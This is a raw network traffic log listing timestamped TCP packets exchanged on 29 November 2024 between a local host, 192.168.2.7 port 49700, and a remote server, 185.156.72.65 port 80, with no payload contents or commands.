Nov 29, 2024 19:50:37.340909958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.340933084 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.341101885 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.341134071 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.341737032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.341777086 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.341945887 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.341985941 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.342642069 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.342686892 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.342912912 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.342983961 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.343439102 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.343475103 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.343532085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.343601942 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.344417095 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.344430923 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.344465971 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.344494104 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.345236063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.345283031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.345289946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.345354080 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.346033096 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.346077919 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.346282005 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.346318007 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.346998930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.347038031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.347290039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.347326994 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.348129034 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.348143101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.348167896 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.348187923 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.348696947 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.348737001 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.348752975 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.348790884 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.349514961 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.349565983 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.349632978 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.349673986 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.350608110 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.350620985 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.350651026 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.350673914 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.351327896 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.351372957 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.351500034 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.351537943 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.352364063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.352376938 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.352402925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.352507114 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.352982044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.353022099 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.353055000 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.353092909 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.354052067 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.354094028 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.354197979 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.354233980 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.355138063 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.355174065 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.355190992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.355223894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.355648041 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.355688095 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.355974913 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.356015921 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.356777906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.356790066 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.356810093 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.356826067 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.357671022 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.357711077 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.357733011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.357769012 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.357858896 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.357899904 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.358043909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.358079910 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.359107971 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.359121084 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.359148026 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.359179974 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.359674931 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.359710932 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.359730005 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.359771013 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.447563887 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.447612047 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.447640896 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.447664976 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.447668076 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.447710037 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.447741985 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.447782040 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.448549032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.448597908 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.448664904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.448707104 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.449421883 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.449489117 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.449523926 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.449583054 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.450021029 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.450064898 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.450139046 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.450179100 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.450939894 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.450993061 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.451014996 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.451051950 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.451843023 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.451900005 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.452142954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.452189922 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.452944040 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.453002930 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.453042030 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.453094959 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.454063892 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.454116106 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.454257965 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.454310894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.455017090 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.455070019 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.455106974 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.455152035 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.455542088 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.455588102 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.455602884 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.455642939 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.456202984 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.456263065 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.456295967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.456341028 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.456986904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.457036972 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.457082033 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.457118034 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.457941055 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.457953930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.457983971 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.458010912 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.458801031 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.458838940 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.458920002 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.458980083 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.459594011 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.459638119 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.459702969 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.459743977 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.460445881 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.460496902 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.460558891 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.460604906 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.461324930 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.461369991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.461441994 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.461479902 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.462229967 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.462270021 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.462347031 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.462385893 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.463130951 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.463141918 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.463175058 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.463190079 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.463947058 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.463992119 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.464030027 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.464061975 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.464823008 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.464834929 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.464921951 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.465698004 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.465744972 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.465823889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.465866089 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.466545105 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.466589928 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.466677904 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.466717005 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.535703897 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.535768032 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.535854101 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.535881996 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.536124945 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.536170006 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.536323071 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.536364079 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.537024021 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.537086964 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.537143946 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.537188053 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.537787914 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.537832022 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.538104057 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.538150072 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.538227081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.538264990 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.538958073 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.539005995 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.539042950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.539119005 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.539818048 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.539887905 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.539887905 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.539927006 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.540709019 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.540723085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.540749073 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.540774107 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.541558027 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.541610003 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.541706085 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.541750908 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.542515039 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.542570114 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.542577982 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.542608023 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.543363094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.543378115 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.543426991 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.544253111 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.544303894 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.544312000 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.544353962 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.545053959 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.545105934 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.545129061 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.545173883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.545929909 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.545968056 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.546040058 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.546102047 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.546806097 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.546871901 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.546906948 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.546951056 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.547692060 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.547749996 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.547781944 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.547816992 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.548538923 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.548578024 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.548676014 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.548744917 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.549408913 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.549449921 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.549554110 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.549593925 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.550239086 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.550277948 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.550353050 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.550385952 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.551143885 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.551186085 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.551213980 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.551260948 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.551995993 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.552033901 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.552140951 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.552184105 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.552910089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.552953959 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.553026915 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.553057909 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.553735971 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.553786039 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.553886890 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.553932905 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.554600954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.554666042 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.554680109 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.554739952 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.555469990 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.555546999 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.555555105 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.555609941 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.556413889 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.556474924 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.556626081 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.556679010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.557202101 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.557254076 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.557343006 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.557384968 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.558082104 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.558162928 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.559026957 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.559084892 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.559087992 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.559129000 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.559480906 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.559531927 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.559602022 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.559647083 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.560319901 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.560376883 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.560406923 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.560451031 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.561193943 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.561239958 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.648770094 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.648822069 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.648866892 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.648902893 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.649260044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.649327040 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.649342060 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.649379969 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.650121927 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.650208950 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.650218010 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.650265932 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.650973082 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.651021004 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.651088953 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.651132107 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.651844025 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.651896954 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.651909113 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.651941061 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.652679920 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.652733088 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.652786970 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.652828932 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.653614044 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.653671980 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.653672934 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.653719902 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.654474974 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.654534101 CET	49700	80	192.168.2.7	185.156.72.65
Nov 29, 2024 19:50:37.654560089 CET	80	49700	185.156.72.65	192.168.2.7
Nov 29, 2024 19:50:37.654604912 CET	49700	80	192.168.2.7	185.156.72.65
